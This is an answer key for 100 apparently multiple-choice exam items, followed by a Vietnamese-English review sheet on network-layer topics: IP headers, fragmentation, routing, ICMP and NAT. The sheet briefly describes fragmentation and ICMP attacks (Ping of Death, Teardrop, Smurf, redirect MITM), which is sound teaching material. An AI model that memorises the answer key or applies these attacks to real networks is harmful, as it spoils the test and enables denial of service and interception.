1.B 2.B 3.C 4.B 5.B 6.B 7.B 8.B 9.B 10.B 11.B 12.B 13.B 14.B 15.B 16.C 17.B 18.B 19.B 20.B 21.B 22.C 23.B 24.B 25.B 26.B 27.B 28.B 29.B 30.B 31.B 32.C 33.B 34.C 35.B 36.C 37.B 38.B 39.B 40.B 41.B 42.B 43.C 44.B 45.B 46.B 47.B 48.B 49.B 50.B 51.B 52.B 53.B 54.B 55.C 56.C 57.C 58.B 59.C 60.B 61.B 62.D 63.B 64.B 65.B 66.B 67.B 68.B 69.B 70.B 71.C 72.B 73.B 74.B 75.B 76.C 77.C 78.C 79.B 80.C 81.B 82.B 83.C 84.B 85.B 86.B 87.B 88.B 89.B 90.B 91.C 92.B 93.B 94.B 95.B 96.B 97.B 98.B 99.C 100.B

BẢNG TÓM TẮT NHANH - CHƯƠNG 8

1. NETWORK LAYER

  • Forwarding: Local, move packets input→output
  • Routing: Global, determine paths, routing algorithms
  • Data plane: Local forwarding
  • Control plane: Network-wide routing (Traditional in routers, SDN remote)

2. IP HEADER

  • Min 20 bytes: Ver(4b), IHL(4b), ToS(8b), TotalLen(16b), ID(16b), Flags(3b), Offset(13b), TTL(8b), Proto(8b), Chksum(16b), SrcIP(32b), DstIP(32b)
  • Max size: 65,535 bytes (16-bit Total Length)
  • TTL: Decremented mỗi hop, = 0 → drop + ICMP Type 11
  • Offset: ÷ 8 (address 65,528 bytes)

3. FRAGMENTATION

  • MTU: 1500 bytes (Ethernet)
  • Reassembly: CHỈ at destination
  • Offset = data_bytes ÷ 8
  • Flags: 1 = More Fragments, 0 = Last

4. FRAGMENTATION ATTACKS

  • Ping of Death: Packet > 65,536 bytes → buffer overflow
  • Teardrop: Overlapping fragments → negative gap
  • DoS: 2 packets (offset 0 & 65535) → tie 64KB resources

5. ROUTING

  • Rule: Longest match
  • RPF: Reverse lookup, symmetric = Allow, asymmetric = Drop
  • Config: Routers (OSPF, BGP), Hosts (DHCP, default, manual, ICMP redirect)

6. ICMP TYPES

  • 0: Echo Reply (ping)
  • 3: Dest Unreachable (code 0=net, 1=host, 3=port)
  • 5: Redirect (MITM!)
  • 8: Echo Request (ping)
  • 11: TTL Expired (traceroute)

7. ICMP ATTACKS

  • Redirect: MITM, CHỈ local (same LAN), RPF blocks remote
  • Smurf: Spoof src=victim, dst=broadcast → all reply victim
  • Flooding: Massive ICMP → DoS

8. NAT

  • Mục đích: All local devices share 1 public IP
  • Table: WAN addr:port ↔ LAN addr:port
  • Outgoing: Change src to NAT IP:new port

CHUẨN BỊ THI: Nhớ kỹ IP header fields, TTL traceroute, fragmentation (offset ÷ 8, reassembly at dest), 3 fragmentation attacks, longest match routing, RPF, ICMP types (0,3,5,8,11), ICMP attacks limitations (local only, RPF), và NAT translation!